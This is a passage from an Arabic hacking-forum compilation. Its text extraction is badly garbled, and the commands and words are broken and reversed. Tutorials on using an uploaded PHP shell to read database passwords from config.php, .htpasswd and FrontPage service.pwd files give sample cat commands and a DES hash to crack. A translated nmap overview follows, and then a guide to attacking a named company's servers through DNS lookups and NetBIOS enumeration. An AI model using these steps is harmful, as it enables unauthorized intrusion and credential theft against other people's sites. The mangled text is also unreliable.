‫‪ -٥‬ﺿﻊاﻟﻌﻼﻣﺔﻟﯿﺨﺒ ﺮك ﻣﺎ ﯾ ﺤﺪ ث ﻋﻨﺪ وﺟﻮد ﺧﻄﺄ‬


‫*‪*-----------------------------------------------‬‬
‫*‪*-----------------------------------------------‬‬

‫اﻟﺠﺰ ءاﻟﺜﺎﻟﺚ ‪:‬‬


‫^^^^^^^^^‬
‫ﺘ ﺤﻤﯿ ﻞ ﻫﺬااﻟﻤﻠ ﻒ ‪:‬‬
‫اﻟﺨﺪ ع واﻟﻄ ﺮ قﻟ‬

‫*‪*-----------------------------------------------‬‬

‫ﻫﻨﺎﺗﺄﺗﻲاﻟﻤﺸﻜﻠﻪ !!!‬

‫ﺘﻲاﺗﺒﻌﻬﺎاﻧﺎ ﺷﺨﺼﯿﺎ‬
‫ً‬ ‫ﺘﻌ ﺮ ضﺑﻌ ﺾاﻟﻄ ﺮ قاﻟ‬
‫ﺘ ﺤﯿﻠﻪ وﺳﻨﺴ‬
‫ﻟﻜﻦﻟﯿﺴ ﺖ ﻣﺴ‬

‫ـ ‪txt.hacked‬‬ ‫ﺘﻄﯿﻊ ﻣﻨﻬﺎﺗ ﺤﻤﯿ ﻞاﻟﻤﻠ ﻒ ﻣﺜﺎ ل ‪:‬ﺛﻐ ﺮةاﻟﻨﯿﻮكاﻟﻘﺪﯾﻤﺔ ﺣﻘ ﺖاﻟ‬ ‫‪-١‬اﯾﺠﺎدﺛﻐ ﺮةﺗﺴ‬
‫*‪*-----------------------------------------------‬‬
‫ً و ﺣ ﺮﯾ ﺺ‬ ‫ﻗﻊ ذﻛﻲ ﺟﺪا‬ ‫ﻗﻊ ﻣﻌﯿﻦ وﻛﺎن ﺻﺎ ﺣﺐاﻟﻤﻮ‬ ‫ﺘ ﺮا ق ﻣﻮ‬‫‪-٢‬ﻟﻨﻔ ﺮ ضاﻧﻨﺎ ﻧ ﺮﯾﺪا ﺧ‬
‫ﻗﻊﻓﻲ ﻧﻔ ﺲاﻟﺴﯿ ﺮﻓ ﺮاو ﻋﻠﻰ‬ ‫ﺘ ﻀﯿﻔﺔ و ﻧ ﺤﺎو لاﻟﺒ ﺤﺚ ﻋﻦ ﻣﻮا‬ ‫ًﺗ ﺤﺪﯾﺪاﻟﺸ ﺮﻛﺔاﻟﻤﺴ‬ ‫ﻫﺬي ﻃ ﺮﯾﻘﻪﻗﺪﺗﻨﻔﻊاوﻻ‬
‫ﺘ ﻀﺎﻓﺔ ﯾﻜﻮن ﺻﺎ ﺣﺒﻬﺎ دﻟ ﺦ وﻧ ﺤﺎو ل ﻧﻠﻘﻰﺛﻐ ﺮة ﻧ ﺤ ﻤ ﻞ ﻣﻨﻬﺎاﻟﻤﻠ ﻒ‬‫ﻗ ﻞﻓﻲ ﻧﻔ ﺲ ﺷ ﺮﻛﺔاﻷﺳ‬ ‫اﻷ‬
‫*‪*-----------------------------------------------‬‬
‫ﺘﻲﺗﺪﻋﻢاﻟﺒﻲاﺗ ﺶﺑﻲ‪....‬‬ ‫ﻗﻊاﻟﻤﺠﺎﻧﯿﺔاﻟ‬ ‫‪-٣‬اﻟﻤﻮا‬

‫‪١ ٩٥‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" درس ﻋﻦ اﻟـ‪) PHP Shell‬اﳉﺰء اﻟﺜﺎﻧﻲ( "‬

‫‪$$$$$$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪Arab VieruZ :‬‬
‫‪$$$$$$$$$$$$$$$‬‬

‫ﺘﺎﺑﻊاﻟﻤﻮ ﺿﻮ ع ﻣﺒﺎﺷ ﺮه‬


‫ﻧ‬

‫اﻟﺠﺰ ءاﻟ ﺮاﺑﻊ ‪:‬‬


‫^^^^^^^^‬
‫ﻃ ﺮ قاﻟ ﺤﺼﻮ ل ﻋﻠﻰاﻟﺒﺎﺳﻮرد‪:‬‬
‫*‪*-----------------------------------------------‬‬
‫ـ ‪٢PHP Shell‬‬ ‫ﻫﺬااﻟﺠﺰ ء ﺳﯿﺄ ﺧﺬ ﻣﻮ ﺿﻮ عاﻟ‬
‫ﺘﺮ ق ‪.‬‬‫ﺘﻲﻗﺪﺗﻮاﺟﻪاﻟﻤﺨ‬ ‫ﻃ ﺮ قاﻟ ﺤﺼﻮ ل ﻋﻠﻰاﻟﺒﺎﺳﻮردﻫﻲ ﻣﻦا ﺻﻌﺐاﻟﻄ ﺮ قاﻟ‬
‫*‪*-----------------------------------------------‬‬
‫ﺘﻲﺗﺴﻤﻰﺑﺎﻟﻌﺎدة ‪php.config‬‬ ‫ـ ‪My SQL‬اﻟ‬ ‫‪-١‬ا ﺧﺬاﻟﺒﺎس ﻣﻦ ﻣﻠﻔﺎ تاﻛﺴ ﺲاﻟ‬
‫ـ ‪PHP Shell‬‬ ‫ﺘﺎﻟﻲﻓﻲاﻟ‬ ‫وﯾﻤﻜﻦا ﺧﺬاﻟﺒﺎس ﻋﻦ ﻃ ﺮﯾ ﻖﺗﻨﻔﯿﺬاﻷﻣ ﺮاﻟ‬
‫ﺘﺎﻟﻲ ‪php.cat config‬‬ ‫ﺘﺎﺑﺔاﻷﻣ ﺮاﻟ‬ ‫اﻟﺬﻫﺎباﻟﻰاﻟﻤﺠﻠﺪاﻟﺬي ﯾﻮﺟﺪﻓﯿﻪ ﻫﺬااﻟﻤﻠ ﻒ وﻛ‬
‫ﺘﻐﯿ ﺮا ت‬‫وﺳﯿﻈﻬ ﺮاﻟﺒﺎﺳﻮردﻓﻲا ﺣﺪاﻟﻤ‬
‫*‪*-----------------------------------------------‬‬
‫ـ ‪htpasswed.‬‬ ‫‪-٢‬ا ﺧﺬاﻟﺒﺎساﻟﻤﺸﻔ ﺮ ﻣﻦ ﻣﻠ ﻒاﻟ‬
‫ﺘﻰﺗﺠﺪ ﻣﻜﺎن‬ ‫ـ ‪ htaccess.‬ﺣ‬ ‫ﺘﺢ اﻟ‬‫وﯾﻤﻜﻦاﺟﺎدﻫﺬااﻟﻤﻠ ﻒﻓﻲا ﺣﺪ ﻣﺠﻠﺪا تاﻟﺴﯿ ﺮﻓ ﺮ واذاﻟﻢﺗﺠﺪهﻗﻢﺑﻔ‬
‫اﻟﻤﻠ ﻒاﻟﺴﺎﺑ ﻖ ﻣﺜﺎ ل ‪/passwd/admin/forum/htpasswds./site/home :‬‬
‫اﻷﻣ ﺮ ‪swdpas/admin/forum/htpasswds./site/home/cat :‬‬
‫ﺘﺸﻔﯿ ﺮ ‪ DES‬ﯾﻌﻨﻲﺗﻘﺪرﺗﻔﻜﻪﺑﺠﻮن ذا راﯾﺒ ﺮ‬ ‫ﺘﺠﺪاﻟﺒﺎساﻟﻤﺸﻔ ﺮﺑ‬ ‫ﺳ‬
‫‪oerdY٣oS٤nymw:user‬‬
‫*‪*-----------------------------------------------‬‬
‫ﺘﯿﻨﺸﻮن ﺳﯿ ﺮﻓ ﺮاو ‪: pwd.service‬‬ ‫‪ -٣‬ﻃ ﺮﯾﻘﺔاﻷﻛﺴ‬
‫وﻫﻮﺗﺎﺑﻊﻟﻠﻔ ﺮوﻧ ﺖﺑﯿ ﺞ وﯾﻮﺟﺪﺑﻪاﻟﺒﺎﺳﻮرداﻟﺨﺎ صﺑﺎﻟﻔ ﺮوﻧ ﺖﺑﯿ ﺞ ﻣﺸﻔ ﺮ ‪DES‬‬
‫وﯾﻮﺟﺪ دا ﺧ ﻞ ﻣﺠﻠﺪ ‪:‬‬
‫_‪tvp_itv‬‬
‫اﻷﻣ ﺮ ‪pwd.service/tvp_itv_/www /site/home/cat :‬‬
‫راﺑﻂ ‪ :‬راﺟﻊ درس ‪DeXXa‬اﻟﺨﺎ صﺑﻬﺬااﻟﻘﺴﻢ‬
‫‪oerdY٣oS٤nymw:user‬‬
‫*‪*-----------------------------------------------‬‬
‫ﺘﺒﺎرﻫﺎﻛﻘﺴﻢ ﻻﻛﻦﻛﻤﻼ ﺣﻈﺔاﻻ وﻫﻲ ‪:‬‬ ‫‪ -٤‬ﻻ ﯾﻤﻜﻦاﻋ‬
‫ﻗﻊاﻛﺴ ﺲ ﺧﺎ صﻟﺪ ﺧﻮ لﻫﺬا‬‫ـ ‪ phpMyAdmin‬وﯾﻜﻮنﻟﻜﻦ ﻣﻮ‬ ‫ﺘﺎ ت ﻣﺜ ﻞاﻟ‬ ‫ﺘ ﺤﺪﻓﻲ ﺳﻜ ﺮﺑ‬ ‫ﻗﻊﺗ‬‫انﺑﻌ ﺾاﻟﻤﻮا‬
‫ـ ‪ php.config‬ﯾﻜﻮناﻟ ﺮو تﻟﻠﻘﺎﻋﺪة ﯾﻌﻨﻲ ﯾﻤﻜﻦﺗﻌﺪ ل وﺗﻤﺴﺢايﻗﺎﻋﺪةﻷي‬ ‫اﻟﺴﻜ ﺮﺑ ﺖ وﯾﻜﻮنﺑﻤﻠ ﻒاﻟ‬
‫ﻗﻊﻛﺎن !!‬ ‫ﻣﻮ‬

‫‪١ ٩٦‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" درس ﻋﻦ اﻟـ‪) PHP Shell‬اﳉﺰء اﻟﺜﺎﻟﺚ( "‬

‫‪$$$$$$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪Arab VieruZ :‬‬
‫‪$$$$$$$$$$$$$$$‬‬

‫اﻟﺠﺰ ءاﻟﺨﺎﻣ ﺲ واﻷ ﺧﯿ ﺮ‬


‫^^^^^^^^^^^^^^‬
‫ﺑﻤﺎاﻧﻚاﻵن ﻋ ﺮﻓ ﺖ ﻣﻌﻈﻢاﻷﺷﯿﺎ ءﻟﻜﻦ ﻻﺑﺪ ﻣﻦ وﺟﻮد ﻣﺸﺎﻛ ﻞ ﺳﺄذﻛ ﺮاﻟﺬياﺻﺎﺑﻨﻲ‬
‫*‪*-----------------------------------‬‬
‫ﻗﻊاﻻ ﺧ ﺮى ‪:‬‬ ‫‪ -١‬ﻣﺸﻜﻠﺔ ﻋ ﺮ ضاﻟﻤﻮا‬
‫ﻗﻊاﻟﻤﻮﺟﻮدةﻓﻲاﻟﺴﯿ ﺮﻓ ﺮﻓﻲ ‪:‬‬ ‫ﺟﻤﯿﻊاﻟﻤﻮا‬
‫‪home/‬‬
‫اﻷﻣ ﺮ ‪:‬ﻗﻢﺑﺎﻟﺬﻫﺎباﻟﻰ ﻣﺠﻠﺪاﻟ ﺮو ت ‪/‬‬
‫‪home/a -ls‬‬
‫ﻗﻊ ﻣﺎﻟﻌ ﺮ ﺿﻪ‬ ‫ﺘﺠﺪ ﻣﺠﻠﺪا تﻛ ﻞ ﻣﺠﻠﺪ ﯾ ﺤﻮي ﻣﻠﻔﺎ ت ﻣﻮ‬ ‫ﺳ‬
‫‪SITE/home/a -ls‬‬
‫ﻗﻊاواﻟﻤﺠﻠﺪ‬ ‫‪= SITE‬اﺳﻢاﻟﻤﻮ‬
‫*‪*-----------------------------------‬‬
‫ﻗﻊ ‪:‬‬ ‫‪ -٢‬ﻣﺸﻜﻠﺔ ﻋ ﺮ ض ﻣﻠﻔﺎ تاﻟﻤﻮ‬
‫ﻗﻊ اﻟ ﺤ ﻞ ‪:‬‬‫ﻗﻊاﻻاذاﻛﻨ ﺖاﻧ ﺖ رو تاو ﺻﺎ ﺣﺐاﻟﻤﻮ‬ ‫ﺑﻌ ﺾاﻟﺴﯿ ﺮﻓ ﺮا ت ﻻﺗﺴﻤﺢﺑﺪ ﺧﻮ ل ‪home‬اﻟﻤﻮ‬
‫ﻗﻢﺑﺪ ﺧﻮ ل ‪:‬‬
‫‪/public_html/tesi/home‬‬
‫او‬
‫‪/www/site/home‬‬
‫ﺘﻲﺗﻌ ﺮ ض‬ ‫ﻗﻊاﻟ‬ ‫ﻟﺪ ﺧﻮ لاﻟﻰ ﻣﻠﻔﺎ تاﻟﻤﻮ‬
‫*‪*-----------------------------------‬‬
‫‪-٣‬ﺑﻌ ﺾاﻷواﻣ ﺮ ﻻﺗﻌﻤ ﻞ‬
‫ﻗﺼﺪاﺻﺪاراﻟﻜ ﺮﻧ ﻞ‪.‬‬ ‫ﺘﻌﻤﺎ لﺑﺎك دور ﺧﺎ صﺑﻜ ﺮﻧ ﻞاﻟﺴﯿ ﺮﻓ ﺮ ‪...‬ا‬ ‫ﻫﺬه ﻣﺸﻜﻠﻪ ﻣﻦاﻟﺼﻌﺐ ﺣﻠﻬﺎ وﯾﺠﺐاﺳ‬

‫‪١ ٩٧‬‬
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

" anmap ‫" ﺷﺮح أداة‬

$$$$$$$$$$$$$$$$$$
‫اﻟﻬﻜ ﺮاﻟﺨﺠﻮ ل‬:‫ﺘ ﺮﺟﻢﺑﻮاﺳﻄﺔ‬
‫ﻣ‬
$$$$$$$$$$$$$$$$$$

: ‫اﻹﺳﻢ‬
‫أداةﻛﺸ ﻒ ﻋﻦاﻟﺸﺒﻜﺎ ت و ﻣﺎﺳﺢأﻣﻨﻲ‬- nmap

: ‫اﻟﺨﻼﺻﺔ‬
‫اﻟﺨﯿﺎرا ت‬- ‫أﻧﻮا عاﻟﻤﺴﺢ‬

: ‫اﻟﻮ ﺻ ﻒ‬

‫ﺘﻘ ﺮﯾ ﺮ و ﻣﻌ ﺮﻓﺔاﻟﻤ ﻀﯿﻔﯿﻦ‬‫ﺻﻤﻢﻫﺬااﻟﺒ ﺮﻧﺎﻣ ﺞﻟﻜﻲ ﯾﺴﻤﺢﻟﻤﺪرا ءاﻟﻨﻈﺎم واﻷﻓ ﺮادﺑﻤﺴﺢ ﺷﺒﻜﺎ تﻛﺒﯿ ﺮة ﻟ‬
: ‫ وﺗﺪﻋﻢاﻹﻧﻤﺎب ﻋﺪدﻛﺒﯿ ﺮ ﻣﻦﺗﻘﻨﯿﺎ تاﻟﻤﺴﺢ ﻣﺜ ﻞ‬. ‫وﻣﺎذا ﯾﻘﺪﻣﻮن ﻣﻦ ﺧﺪﻣﺎ ت‬
UDP
()TCP connect
(TCP SYN (half open
(ftp proxy (bounceattack
Reverse-ident
(ICMP (ping sweep
FIN
ACK sweep
Xmas Tree
SYN sweep
.and Null scan

:‫ ﻣﺜ ﻞ‬.. ‫ﺘﻘﺪﻣﺔ‬
‫ً ﻋﺪد ﻣﻦاﻟﻤﻤﯿﺰا تاﻟﻤ‬
‫اﻹﻧﻤﺎبﺗﻘﺪمأﯾ ﻀﺎ‬

TCP/IP fingerprinting remote OS detection via


stealth scanning
dynamic delay and retransmission calculations
parallel scanning
detection of down hosts via parallel pings
decoy scanning port
filtering detection
direct (non-portmapper) RPC scanning
fragmentation scanning
flexible target and port specification

١ ٩٨
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﻲأﺟ ﺮﯾ ﺖ ﻋﻠﯿﻬﺎ ﻋﻤﻠﯿﺔ‬ ‫ﺘﻲﺗﻮﺟﺪﻓﻲاﻵﻟﺔاﻟ‬ ‫ً ﻣﺎﺗﻜﻮن ﻋﻠﻰﻫﯿﺌﺔﻗﺎﺋﻤﺔﺑﺎﻟﺒﻮرﺗﺎ تاﻟﻤﻬﻤﻪاﻟ‬ ‫ﺘﺎﺋ ﺞاﻹﻧﻤﺎب ﻋﺎدةا‬
‫ﻧ‬
‫ً ﯾﻌﻄﯿﻨﺎاﻟﺒﻮرﺗﺎ ت وإﺳﻢاﻟﺨﺪﻣﺔ واﻟﻌﺪد واﻟ ﺤﺎﻟﺔ واﻟﺒ ﺮوﺗﻮﻛﻮ ل‬ ‫اﻟﻤﺴﺢ ‪ .‬واﻹﻧﻤﺎب داﺋﻤﺎ‬
‫ﺘﻮ ﺣﺔاو ﻣ ﺮﺷ ﺤﺔأو ﻏﯿ ﺮ ﻣ ﺮﺷ ﺤﺔ‬ ‫اﻟ ﺤﺎﻟﻪإﻣﺎأنﺗﻜﻮن ﻣﻔ‬
‫ﺘﻮ ﺣﺔﺗﻌﻨﻲأناﻵﻟﺔ ﺳﻮ فﺗﻘﺒ ﻞأيإﺗﺼﺎ لﺑﻬﺬااﻟﺒﻮر ت‬ ‫ﻣﻔ‬
‫ﺘ ﺮ )ﻣ ﺮﺷﺢ(أوأي ﻋﻘﺒﺔأ ﺧ ﺮىﺗﻐﻄﻲ ﻫﺬااﻟﺒﻮر ت وﺗﻤﻨﻊاﻹﻧﻤﺎب ﻣﻦ‬ ‫اﻟﻤ ﺮﺷ ﺤﺔﺗﻌﻨﻲأنﻫﻨﺎكﻓﺎﯾ ﺮوو لأوﻓﻠ‬
‫ًأو ﻻ‬
‫ﺘﻮ ﺣﺎ‬‫ﻣﻌ ﺮﻓﺔ ﺣﺎﻟﺔاﻟﺒﻮر تإذاﻛﺎن ﻣﻔ‬
‫ﺘ ﺮ ) ﻣ ﺮﺷﺢ(‬‫ﻏﯿ ﺮ ﻣ ﺮﺷﺢﺗﻌﻨﻲﺑﺄنﻫﺬااﻟﺒﻮر ت ﻣﻌ ﺮو فﻟﺪىاﻹﻧﻤﺎبﺑﺄﻧﻪ ﻣﻐﻠ ﻖ وﻻ ﯾﺒﺪوأنأيﻓﺎﯾ ﺮوو لأوﻓﻠ‬
‫ﺘﻬﻢإﻻﻓﻲ ﺣﺎﻟﺔ وا ﺣﺪة‬ ‫ﺗﺪ ﺧ ﻞﻓﻲ ﻣ ﺤﺎوﻟﺔاﻹﻧﻤﺎب واﻟﺒﻮرﺗﺎ ت ﻏﯿ ﺮاﻟﻤ ﺮﺷ ﺤﺔﻫﻲأﻏﻠﺐاﻟ ﺤﺎﻻ ت وﻻ ﯾﻤﻜﻦ ﻣﻌ ﺮﻓ‬
‫ﺘﻲأﺟ ﺮﯾ ﺖﻟﻬﻢ ﻋﻤﻠﺔاﻟﻤﺴﺢﻓﻲ ﺣﺎﻟﺔﺗ ﺮﺷﯿﺢ‬ ‫‪ ،‬ﻫﻲأن ﯾﻜﻮن ﻣﻌﻈﻢاﻟﺒﻮرﺗﺎ تاﻟ‬
‫ﺘﺎﻟﯿﺔﻓﻲاﻟ ﺮﯾﻤﻮ ت‬ ‫ﺘﺨﺪﻣﻪﻓﻲاﻹﻧﻤﺎبﻓﯿﻤﻜﻦأن ﯾﺒﻠﻎ ﻋﻦاﻟ ﺤﺎﻻ تاﻟﻤﻤﯿﺰةاﻟ‬ ‫ﺘﻤﺎد ﻋﻠﻰاﻟﺨﯿﺎرا تاﻟ ﻤﺴ‬ ‫وﺑﺎﻹﻋ‬
‫ﻫﻮﺳ ﺖ ‪:‬‬
‫ﺘﺨﺪم‬‫اﻟﻨﻈﺎماﻟﻤﺴ‬
‫‪TCP sequencability‬‬
‫ﺘﺨﺪﻣﯿﻦاﻟﺬﯾﻦ ﯾﺸﻐﻠﻮناﻟﺒ ﺮاﻣ ﺞاﻟﻤﺮﺗﺒﻄﺔﺑﻜ ﻞﺑﻮر ت‬ ‫أﺳﻤﺎ ءاﻟﻤﺴ‬
‫أﺳﻤﺎ ءاﻟﺪيإنإس‬
‫وﺑﻌ ﺾاﻷﺷﯿﺎ ءاﻷ ﺧ ﺮى‪...‬‬

‫‪١ ٩٩‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" ﻃﺮﯾﻘﺔ ﻹﻗﺘﺤﺎم ا ﻟﺴﲑﻓﺮات ﺑﺪون ﺛﻐﺮات "‬

‫‪$$$$$$$$$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪network access :‬‬
‫‪$$$$$$$$$$$$$$$$$$‬‬

‫ﻓﯿﻪ ﻃ ﺮ ق ﻣﻌ ﺮوﻓﻪﺗﻤﻜﻨﻚ ﻣﻦاﻟﺪ ﺧﻮ ل ﻮﻟﻮﺑﻨﺴﺒﻪ ‪ %٥٠‬ﻋﻠﻰاﻏﻠﺐاﻟﺴﯿ ﺮﻓ ﺮا تاﻟﻤﻮﺟﻮدهﺑﺎﻟﻌﺎﻟﻢﻻ ﺣﻆ ‪%٥٠‬‬

‫ﺘﻪ وﻣﻦ‬ ‫ﺘ‬


‫ﺎوﻻاﻟﺠﻬﻤﺎ تاﻻوﻟﻰ داﺋﻤﺎﯾﻜﻮناﻟﻐ ﺮ ض ﻣﻨﻬﺎﺗﻜﻮﯾﻦ ﻣﻌﻠﻮﻣﺎ ت ﻋﺎﻣﻪ ﻋﻦاﻟﺴﯿ ﺮﻓ ﺮاﻟﺬي ﯾ ﺮاد ﻣﻬﺎﺟﻤ‬
‫ﺘ ﺮﻛﺰاﻟﻬﺠﻮم‪.‬‬ ‫ﻫﻨﺎ ﻧﺒﺪااﻟﻬﺠﻮم وﻋﻠﻰاياﺳﺎس ﯾ‬
‫ﺘﻮﻓ ﺮ واﻟﻤﻌﻠﻮﻣﺎ تاﻟﻤﻮﺟﻮده‬‫ﺘ ﺤﺎمﻛﺎﻣ ﻞ ﺣﺴﺐاﻟﻤﻮﺟﻮد واﻟﻤ‬ ‫ﻗ‬
‫ﺎ ﺣﯿﺎﻧﺎ ﯾﻜﻮنﻫﺠﻮم ﺣ ﺮﻣﺎن ﺧﺪﻣﻪ وا ﺣﯿﺎﻧﺎﻫﺠﻮما‬
‫ﻟﺪﯾﻨﺎ ‪ ..........‬ﻃﯿﺐﻟﻨﻔ ﺮ ضاﻧﻨﺎ ودﻧﺎ ﻧﺨ ﺶ ﻋﻠﻰ ﺷ ﺮﻛﻪ ﻣﻌﯿﻨﻪﺑﺎﺳﻢ ‪ aswind.COM‬ﺎﻟﺨﻄﻮهاﻷوﻟﻰ ﻫﻲ‬
‫ﺘﻌ ﺮ ف ﻋﻠﻰ ﻣﺪى ﻋﻨﻮان ‪ ip‬ﺎﻟﺨﺎ ﺻﻪﺑﻬﺬهاﻟﺸ ﺮﻛﻪ وﻫﺬا ﺳﻬ ﻞ‬ ‫ﺎﻟ‬
‫ﺘﺎﻫ ﻞ‬
‫ﺘﻰ ﯾﻌﻄﻮﻧﻚ ﺧﺪﻣﺎ تﺗﺴ‬ ‫ﻗﻊ ‪ INTERNIC.NET‬ﺣ‬ ‫ﺘﺴﺠﯿ ﻞﻓﻲ ﻣﻮ‬ ‫ﺎو ل ﺷﻲاﻧﺼﺢﺑﺎﻟ‬
‫ﺘﯿﻦﻟﻤﻌ ﺮﻓﻪاﻻيﺑﻲ ﺎوﻻ‬ ‫ﻫﻨﺎك ﻃ ﺮﯾﻘ‬
‫ﻗﻊ‪INTERNIC.NET‬‬ ‫ﻋﻦ ﻃ ﺮﯾ ﻖاﻟﻤﻮ‬
‫ﻮاﻟﺜﺎﻧﯿﻪ ﻋﻦ ﻃ ﺮﯾ ﻖﺑ ﺮﻧﺎﻣ ﺞاﻟﺪوسﺑﺎﻻﻣ ﺮ ‪:‬‬
‫‪NSLOOKUP‬‬
‫‪SET TYPE = ALL‬‬
‫‪aswind.COM‬‬
‫ﺮا حﺗﻄﻠﻌﻠﻚاﻟﻤﻌﻠﻮﻣﺎ تﻫﺬيﺑﺎﻟ ﻀﺒﻂ ‪:‬‬
‫‪Domain Name: ASWIND.COM‬‬
‫‪Registrar: ONLINENIC, INC.‬‬
‫‪Whois Server: whois.OnlineNIC.com‬‬
‫‪http://www.onlinenic.com/Referral URL:‬‬
‫‪Name Server: DNS.ASWIND.COM‬‬
‫‪Name Server: NS1.ASWIND.COM‬‬
‫‪Updated Date: 01-apr-2002‬‬
‫ﻗﺎماﻟﻤﻠﻘﺎﻣﺎ ت ﺎﻟﺨﺎ ﺻﻪ ب‪DNS = 2‬‬ ‫ﻣﻌﻨﺎاﻟﻜﻼم ﻫﺬاان ﺷ ﺮﻛﻪ ‪ aswind.com‬ﻮ ﺿﻌ ﺖار‬
‫ﻗ ﻞ ﺳﯿ ﺮﻓ ﺮﯾﻦ ﺷﻐﺎﻟﯿﻦﺑﺨﺪﻣﻪ ‪ DNS‬ﯾﻌﻨﻲ ﻫﻢ‬ ‫ﯾﻌﻨﻲ ﻋﺪد‪ ٢‬ﺧﺎدم ‪ DNS‬ﻮﺳﻮ تﻟﻬﺎ ﻧﺸ ﺮ ﯾﻌﻨﻲ ﻫﻨﺎك ﻋﻠﻰاﻻ‬
‫ﺘﺸﻐﯿ ﻞﻟﻸﺟﻬﺰه ﺧﺎ ﺻﻪ ‪DNS‬‬ ‫ﻗﻪاﻟ‬‫ﺘﻘﺪوناناﻟﻤﻮ ﺿﻮ ع ﻣﺎرا ح ﯾﺎ ﺧﺬﻛﺜﯿ ﺮ ﻣﻦ ﻃﺎ‬ ‫ﺘﻌ‬ ‫ﯾ‬
‫ﻫﻨﺎﻓﻲ ﻣﺠﺎ لﻟﻠﺪ ﺧﻮ ل وﺗﻌﺪﯾ ﻞﺑﯿﺎﻧﺎ ت ‪DNS‬ﺑﻤﻌﻨﻰاناﻟﻌﻤﻠﯿﻪﺗﺼﯿ ﺮ واﺳﻌﻪ ﺷﻮيﻓﻘﻂﻗﻢﺑﻨﺸ ﺮ ﻋﻨﻮاﻧﯿﻦ ﻣﻦ‬
‫ﺘ ﺮ ضاﻧﻪﻓﯿﻪاﻛﺜ ﺮ ﻣﻦ ﻋﻨﻮانﻟﻨﻔﻮ ل ‪ ٦‬ﻣﺜﻼ ‪.‬‬ ‫ﻋﻨﻮاوﯾﻦ ‪Ip‬ﻓﻘﻂ ﻣﺜ ﻞ ﻣﺎﺳﻮو ‪aswind.com‬ﻟﻜﻦﻟﻨﻔ‬
‫ﺘ ﺮ ح ﻋﻠﻰاﻟﺸ ﺮﻛﺎ ت ﻮ ﺿﻊ ﻋﻨﻮاوﻧﯿﻦ ‪IP‬ﻟﻠﻨﺸ ﺮ وو ﺿﻊ ﺧﻮادم ‪ DNS‬ﻋﻠﻰاﺟﻬﺰهﻗﺪﯾﻤﻪ وﺑﻄﯿﺌﻪ‬ ‫ﻗ‬‫ﻋﺸﺎنﻛﺬاا‬
‫ﺘﺸﻐﯿ ﻞ ‪ WIN2K‬ﻮ ﺧﺪﻣﻪ ‪ DNS‬ﻋﻠﻰ ﺟﻬﺎز‬ ‫ﻷﻧﻚاﺳﺎﺳﺎﻓﻲ ﺣﺎﺟﻪ ﻞ ‪DNS‬ﺪاﯾﻨﺎﻣﯿﻜﻲ وﻫﺬا ﯾﻌﻨﻲاﻧﻚﺗﻘﻮمﺑ‬
‫وا ﺣﺪ وﻫﺬي ﻣﻦ ﺎﻻﻓﻜﺎراﻟﺠﯿﺪهﻓﻲ ﻧﻈ ﺮياذا و ﺿﻌ ﺖ ﺟﻬﺎز ﺧﺎ صﻓﻘﻂﺑﺎ ل ‪DNS‬‬
‫ﺘﺴﻊ ﻣﻦ‬ ‫ﻃﯿﺐﻟﻨﻔ ﺮ ضاﻧﻚ ﻣﺎﻟﻘﯿ ﺖ ﺷﻲ ﻋﻠﻰاﺟﻬﺰه ‪ DNS‬ﻮﺑﻤﺎاﻧﻚﻓﻲﺑﺪاﯾﻪ ﻫﺠﻮمﻫﺬا ﯾﻌﻨﻲاﻧﻪ ﻋﻨﺪك ﻣ‬
‫ﻗﻮﻧﻲﻓﯿﻪ‬ ‫ﺘﻲ ﺣﺼﻠ ﺖ ﻋﻠﯿﻬﺎ ﻣﻦ ‪ HowIS‬ﻮ ﺻﺪ‬ ‫ﺘﻮﻓ ﺮهﻟﺪﯾﻚ واﻟ‬‫ﺘﺠ ﺮﯾﺐ ﺟﻤﯿﻊاﻟﻌﻨﺎوﯾﻦاﻟﻤ‬ ‫ﻗ ﺖ ﺎذنﻗﻢﺑ‬ ‫اﻟﻮ‬
‫ﺎدوا ت ﻣﻮﺟﻮدهﺑﺎﻟﻨ ﺖ ﻣﻤﻤﻜﻦاﻧﻬﺎﺗﻤﺴﺢ ﻣﺠﻤﻮﻋﻪ ‪ IP‬ﻣﻮﺟﻮدهﻓﻲ ﺷﺒﻜﻪ ﻣﻌﯿﻨﻪ‬

‫ﺘﻄﻌ ﺖاﻧﻚﺗ ﺤﺼ ﻞ‬
‫ﻃﯿﺐﻗﻢﺑﻌﻤ ﻞ ﻣﻠ ﻒاﺳﻤﻪ ‪ LMHOSTS‬ﯾﻮﺟﺪﻓﯿﻪاﺳﻢ ‪NetBios‬ﻟﻜ ﻞ ﻋﻨﻮان ‪ IP‬ﺎﺳ‬
‫ﻋﻠﯿﻪ‬

‫‪٢ ٠٠‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﯾﻌﻨﻲاﻧ ﺖ ﻋ ﺮﻓ ﺖاناﻟﺸﺒﻜﻪ ﻣﻦﻛﻼس ‪ C‬ﻮﻋﻨﻮاﻧﻬﺎ ‪ ٢٠٠٫٢٠٠٫٢٠٠٫٠‬ﺳﻮﻟﻚ ﻣﻠ ﻒ ‪LMHOSTS‬ﺑﺎﺳﻢ‬


‫ﺘﺎج ﻋﻤ ﻞ ‪Net view‬‬ ‫‪NetBios‬ﻮﻣﻠ ﻒﺑﺎﺳﻢ ‪ N2 = 200.200.200.2‬ﻮﻫﻜﺬاﺑﻌﺪﯾﻦﺗ ﺤ‬
‫‪//servername‬ﻟﻜ ﻞاﺳﻢ ﻣﻦ ‪N1‬ﺈﻟﻰ ‪ N254‬ﯾﻌﻨﻲﻛﺎﻧﻚﺗﺴﻮي ﺳﻜﺎنﺑﻮر تﺑ ﺲﺑﻄ ﺮﯾﻘﻪﺛﺎﻧﯿﻪ‬
